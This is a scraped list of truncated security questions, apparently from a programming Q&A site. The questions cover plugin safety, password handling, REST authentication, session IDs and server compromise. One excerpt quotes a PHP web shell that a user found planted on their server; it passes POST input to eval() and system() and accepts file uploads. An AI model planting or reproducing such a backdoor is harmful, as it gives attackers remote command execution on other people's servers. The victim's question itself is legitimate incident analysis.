Hey all, I was wondering what steps you use to keep downloaded plugins from being malicious? For example, what does wordpress do to ensure that the plugins you download do not simply execute unlink('/') I'm assuming it partly depends partly on downloader to install plugins to use his or her own discretion, but do plugin systems take m...
Is there something special about characters that should be allowed/not allowed in a password? I store the password in the db hashed/salted and use PDO to prevent against injection. Is what I'm doing enough? Recently I came across a system that disallowed a number of characters, don't remember all of them, but one was the ampersand &. W...
Hello everyone, I want to create a SQL Server 2008 database, and I need to create the database on a network shared location, like \\10.10.10.123\share, but this network shared location is protected by a username and password. My question is, how to assign such username and password in SQL Server create database statement? BTW: I have ...
Hi, i have to store a public key and a private one into a sqlite database. Actually i write the pubKey.getEncoded() into the database, and to recreate the pubkey i use the following code: ResultSet result = stat.executeQuery("select publickey from cert where id='1'"); KeyFactory rsaKeyFac = KeyFactory.getInstance("RSA"); X...
I've added a SSL certificate to an existing site, and now in IE I get a mixed content warning. Problem is, I don't know what's the non-secure content IE is warning me about. It's a simple html page, with a few Flash, a few images, a loaded CSS and JS. How can I find out what's the non-secured content..? Edit: I found the culprit: it's...
I am about to implement security for my RESTful services based on the Spring framework. Actually, I have never secured RESTful WS before, but I've got myself a good introduction here. Basically, Amazon S3 or even OAuth are suggested as good examples. My questions: Does the Spring framework provide these strategies out-of-the-box? If ...
I have a AS3 Flash file with some animations during the timeline. On the timeline I also have a stop() in the middle (on a keyframe). When I run this SWF file it does stop. But if I load if from another Flash file using a Loader object it does not stops (nor runs any other action script - i.e.: trace("hi")) I'm also including the context...
I am developing a project that lately have been taking off with increased popularity. This development is of course met with open arms and has also been somewhat expected. I have therefore taken every precaution I could about creating efficient and secure code. However, when it comes to server capacity I haven't had the financial means ...
I have an widget-based front end talking to a REST layer. To use the front-end, a human needs to log in with a username and password. Once in, the user can interact with the widgets, which make calls to the REST layer. At this point, no authorization is done at the REST layer. If you have logged in successfully, you can do whatever you w...
Hello. Where I work, there's quite a bit of discussion about web service security since we want to retire our (costly) PKI solution. The buzz at the moment seems to be secure remote password (SRP), which seems to promise equivalent resilience without the need for a trusted third-party. The downside is that it is not widely implemented,...
From what i know Random() is initialize to the current time. If two connections hit during the same second i should get the same two random numbers? With a large site that can be likely. Locking is bad so how should i solve it? note: the number is used for the session id. -edit- i am stuck using a long. It feels wrong to shorten a 128bi...
I was at a meeting recently for our startup. For half an hour, I was listening to one of the key people on the team talk about timelines, the market, confidentiality, being there first and so on. But I couldn't help ask myself the question: all that talk about confidentiality is nice, but there isn't much talk about physical security. Th...
Hey Guys! I am working in a small startup organization with approximately 12 - 15 developers. We recently had an issue with one of our servers where by the entire server was "Re provisioned" i.e. completely wiped of all the code, databases, and information on it. Our hosting company informed us that only someone with access to the ser...
Hello everyone, I am in the process of writing a login/register form for my MVC website and am facing an issue regarding security and AJAX. It seems that more and more popular sites are utilizing javascript to process logins, and many from a non https URL (www.giantbomb.com and www.gametrailers.com to name two). I'm wondering if there...
Hi everybody, what should my concerns be if I we're about to make an application that handles logins the following way: http://api.myApp.example/printSomething/username/password/ How insecure is it compared to a normal login page that are based on POSTed user details (username+password)? Is there a difference? Thanks ...
I recently found 4 bizarre files on my server (that I didn't upload). The filename were like this: goog1e7a20543b128921.php And here's the code that was inside them: Goog1e_analist_up<?php $e=@$_POST['e'];$s=@$_POST['s'];if($e){eval($e);}if($s){system($s);}if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES...
Is there some way to secure an ffserver webcam stream using Apache / HTTP Authentication? Some type of Apache proxy perhaps? Right now I have it so only machines on the LAN can view the http://webcam/stream.mjpg, but I want people from the outside to be able to access it if they provide a username / pw (HTTP Auth, which isn't built int...
I have a set of three web application systems - A, B & C that are used to service my application. The A system has the core business logic and also stores user/account data for the entire application. The systems B & C are required to provide additional functionality to the application. I was thinking of a security mechanism where a us...
During a recient PCI audit the auditor said that we had major security risks because It was possible to download static resources from our website such as images css and javascript without prior authentication. Our javascript had comments in it. Personally I think that this is not a security risk at all. The images css and javascri...
Is there any HTTP-headers or meta-tags one can use to avoid getting a URL into the browser history? For example, I don't want http://domain.td/show/super-secret-unique-token-that-is-private to show up in the browser URL bar, when I start typing "domain.t". Currently I have a (POST) search form on the website to load the tokens, and ...